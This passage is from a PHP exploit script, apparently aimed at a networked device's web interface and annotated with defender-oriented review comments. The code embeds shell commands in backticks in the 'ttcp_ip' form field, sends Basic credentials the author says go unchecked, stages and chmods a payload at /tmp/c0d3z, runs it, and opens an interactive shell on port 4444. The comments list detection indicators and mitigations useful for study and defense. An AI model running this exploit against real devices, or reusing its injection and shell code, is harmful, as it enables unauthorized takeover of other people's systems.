#!/usr/bin/php
> /tmp/c0d3z";
// NOTE(review): this chunk starts mid-file. The `<?php` tag, the definition of
// full_urlencode(), the origin of $host/$port/$vuln/$shellcode and the opening of
// build_payload() (including the loop this statement sits in) are outside this view;
// the fragment above is the tail of a string literal assembled by that loop. What is
// visible: each iteration wraps one command in a request via build_packet(), sends it,
// and waits 100 ms. The redirect target "/tmp/c0d3z" is the file being staged on the
// device -- a filesystem artifact responders can look for.
$cmd = build_packet($host, $port, $vuln, $cmd);
if(!send_packet($host, $port, $cmd)) die("fail\n"); else echo "sent!\n";
usleep(100000);
}
// make it usable
// Last request of build_payload(): makes the staged file world-readable/writable/
// executable so the later "/tmp/c0d3z" request can run it. Two artifacts follow from
// this line alone: a world-rwx /tmp/c0d3z on the device, and an HTTP request whose
// form body carries the text "chmod a+rwx /tmp/c0d3z".
echo "\tConfiguring... ";
$config = build_packet($host, $port, $vuln, "chmod a+rwx /tmp/c0d3z");
if(!send_packet($host, $port, $config)) die("fail\n"); else echo "done!\n";
}

// add in all the HTTP shit
//
// Wraps one shell command in a raw HTTP/1.1 POST to "/$vuln" on $host.
// The command is placed inside backticks in the `ttcp_ip` form field ("-h `...`"),
// i.e. the request depends on the target splicing that field into a shell command
// line without escaping (command injection). full_urlencode() is defined elsewhere
// in the file. The Basic credentials are a fixed string; the author's comment claims
// the target never checks them (an authentication bypass) -- not verifiable here.
//
// Defender notes, all derived from the literal request built below:
//  - Detection: a POST to the $vuln path whose body has `ttcp_ip=` beginning with
//    "-h" and containing (URL-encoded) backticks, alongside `StartEPI=1`.
//  - Mitigation on the device side: validate `ttcp_ip` as an IP literal and hand it
//    to the tool as a discrete argument rather than through a shell; enforce
//    authentication on the handler instead of accepting any Authorization header.
//
// $host    -> Host header value
// $port    -> unused in this function (kept for symmetry with send_packet())
// $vuln    -> request path without the leading "/"
// $payload -> shell command text to embed
// returns  -> the complete request: status line, headers, blank line, body
function build_packet($host, $port, $vuln, $payload)
{
    $exploit = full_urlencode(
        "submit_button=&".
        "change_action=&".
        "submit_type=&".
        "action=&".
        "commit=0&".
        "ttcp_num=2&".
        "ttcp_size=2&".
        "ttcp_ip=-h `".$payload."`&".
        "StartEPI=1"
    );
    $packet = "POST /".$vuln." HTTP/1.1\r\n".
        "Host: ".$host."\r\n".
        // this username:password is never checked ;)
        "Authorization: Basic ".base64_encode("admin:ThisCanBeAnything")."\r\n".
        "Content-Type: application/x-www-form-urlencoded\r\n".
        "Content-Length: ".strlen($exploit)."\r\n".   // byte length of the encoded body
        "\r\n".
        $exploit;
    return $packet;
}

// Fire-and-forget transport: open a TCP connection, write $packet, close. The
// response is never read, so nothing here tells the caller whether the target
// actually ran anything. Returns false if the connect or the write fails.
// NOTE(review): unlike the fsockopen() calls in the main flow, no timeout is passed,
// so a silent target blocks for the ini default_socket_timeout; and on a failed
// fwrite the socket is returned from without fclose().
function send_packet($host, $port, $packet)
{
    $socket = fsockopen($host, $port, $errno, $errstr);
    if(!$socket) return false;
    if(!fwrite($socket, $packet)) return false;
    fclose($socket);
    return true;
}

// ---- main flow (script body). $host, $port, $vuln and $shellcode are assigned
// earlier in the file, outside this view. ----

// Reachability check only: connect and immediately close (30 s timeout).
echo "Testing connection to target... ";
$socket = fsockopen($host, $port, $errno, $errstr, 30);
if(!$socket) die("fail\n"); else echo "connected!\n";
fclose($socket);

// Stage $shellcode into /tmp/c0d3z on the device (see build_payload() above), then
// request its execution through the same injected field.
echo "Sending payload... \n";
build_payload($host, $port, $vuln, $shellcode);
sleep(3); // don't rush him
echo "Executing payload... ";
if(!send_packet($host, $port, build_packet($host, $port, $vuln, "/tmp/c0d3z"))) die("fail\n"); else echo "done!\n";
sleep(3); // don't rush him

// The script now expects a listener on TCP 4444 on the target -- presumably opened by
// the just-executed /tmp/c0d3z (the payload itself is not visible here). Network
// artifact: an inbound connection to port 4444 on the device shortly after the POST
// whose body names /tmp/c0d3z.
echo "Attempting to get a shell... ";
$socket = fsockopen($host, 4444, $errno, $errstr, 30);
if(!$socket) die("fail\n"); else echo "connected!\n";
echo "Opening shell... 
\n";

// Interactive loop over the port-4444 connection. Each typed line is sent with
// ";echo xxxEOFxxx" appended so the end of that command's output can be recognised;
// the reply is read one byte at a time until the marker (or EOF) shows up, then
// printed with the marker stripped. The literal "xxxEOFxxx" in a command stream or
// process output is therefore a distinctive indicator of this tool in use.
// Note: empty() treats "0" as empty, so a typed "0" is sent but not added to history.
while(!feof($socket)) {
    $cmd = readline($host."$ ");
    if(!empty($cmd)) readline_add_history($cmd);
    // there has got to be a better way to detect that we have
    // reached the end of the output than this, but whatever
    // it's late... i'm tired... and it works...
    fwrite($socket, $cmd.";echo xxxEOFxxx\n");
    $data = "";
    do {
        $data .= fread($socket, 1);   // single-byte reads: simple, but one syscall per byte
    } while(strpos($data, "xxxEOFxxx") === false && !feof($socket));
    echo str_replace("xxxEOFxxx", "", $data);
}
?>